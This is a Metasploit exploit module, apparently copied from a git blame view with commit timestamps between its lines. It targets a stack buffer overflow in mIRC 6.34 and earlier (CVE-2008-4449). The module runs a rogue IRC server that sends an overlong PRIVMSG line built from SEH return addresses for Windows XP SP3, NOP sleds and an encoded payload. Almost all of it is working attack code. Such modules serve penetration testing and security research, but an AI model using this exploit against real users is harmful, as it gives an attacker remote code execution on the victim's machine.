2009-07-15 11:44:55 +00:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2009-07-15 11:44:55 +00:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf :: Exploit :: Remote
2009-12-06 05:50:37 +00:00
Rank = NormalRanking
2009-07-15 11:44:55 +00:00
include Msf :: Exploit :: Remote :: TcpServer
include Msf :: Exploit :: Remote :: Seh
def initialize ( info = { } )
super ( update_info ( info ,
2014-03-11 12:44:34 -05:00
'Name' = > 'mIRC PRIVMSG Handling Stack Buffer Overflow' ,
2009-07-15 11:44:55 +00:00
'Description' = > %q{
2010-04-30 08:40:19 +00:00
This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.
By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG
2009-07-15 11:44:55 +00:00
command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads
may be necessary. This module is based on the code by SkD.
} ,
2017-11-09 03:00:24 +11:00
'Author' = > [ 'aushack' ] ,
2009-07-15 11:44:55 +00:00
'License' = > MSF_LICENSE ,
2010-04-30 08:40:19 +00:00
'References' = >
[
2009-07-15 11:44:55 +00:00
[ 'CVE' , '2008-4449' ] ,
2016-07-15 12:00:31 -05:00
[ 'OSVDB' , '48752' ] ,
2009-07-15 11:44:55 +00:00
[ 'BID' , '31552' ] ,
2012-06-28 14:27:12 -05:00
[ 'EDB' , '6666' ]
2009-07-15 11:44:55 +00:00
] ,
'DefaultOptions' = >
{
'EXITFUNC' = > 'process' ,
} ,
'Payload' = >
{
'Space' = > 160 ,
'BadChars' = > " \x00 \x07 \x0a \x0b \x0c \x0d \x20 \x21 \x22 \x23 \x24 \x25 \x27 \x2a \x2c \x2e \x2f \x3a \x3b \x3c \x3e \x3f \x40 \x7b \x7c \x7d " , # This is mostly a guess plus some RFC info.
'StackAdjustment' = > - 3500 ,
} ,
'Platform' = > 'win' ,
'Targets' = >
[
# Patrick - Tested against xpsp3 ok 20090715
[ 'Windows XP SP3' , { 'Rets' = > [
0x7792FBD1 , # SETUPAPI.DLL pop eax pop ret
0x7FFDB5B5 ,
0x779D87B7 , # SETUPAPI.DLL 0x779D87B7 jmp esp
] } ]
] ,
'Privileged' = > false ,
2020-10-02 17:38:06 +01:00
'DisclosureDate' = > '2008-10-02' ,
2009-07-15 11:44:55 +00:00
'DefaultTarget' = > 0 ) )
register_options (
[
OptPort . new ( 'SRVPORT' , [ true , " The IRC server port to listen on " , 6667 ] ) ,
OptString . new ( 'SRVNAME' , [ true , " Welcome to the ... IRC Server Name " , " Internet Relay Network " ] ) ,
2017-05-03 15:42:21 -05:00
] )
2009-07-15 11:44:55 +00:00
end
def on_client_connect ( client )
2014-05-10 23:31:02 +02:00
return unless regenerate_payload ( client )
2009-07-15 11:44:55 +00:00
print_status ( " Client connected! Sending payload... " )
buffer = " :my_irc_server.com 001 wow :Welcome to the #{ datastore [ 'SRVNAME' ] } wow \r \n "
client . put ( buffer )
end
def on_client_data ( client )
client . get_once
2010-06-22 19:11:05 +00:00
select ( nil , nil , nil , 2 )
2009-07-15 11:44:55 +00:00
sploit = " : " + Rex :: Text . rand_text_alphanumeric ( 307 ) + [ target [ 'Rets' ] [ 0 ] ] . pack ( 'V' ) + [ target [ 'Rets' ] [ 1 ] ] . pack ( 'V' )
sploit << make_nops ( 4 ) + [ target [ 'Rets' ] [ 2 ] ] . pack ( 'V' ) + make_nops ( 4 ) + " B " * 12
2010-04-30 08:40:19 +00:00
sploit << Rex :: Arch :: X86 . jmp_short ( 3 ) + Rex :: Text . rand_text_alphanumeric ( 2 )
2009-07-15 11:44:55 +00:00
sploit << make_nops ( 4 ) + payload . encoded + make_nops ( 4 ) + " PRIVMSG wow : /FINGER wow \r \n "
client . put ( sploit )
2010-04-30 08:40:19 +00:00
2009-07-15 11:44:55 +00:00
handler ( client )
service . close_client ( client )
end
end
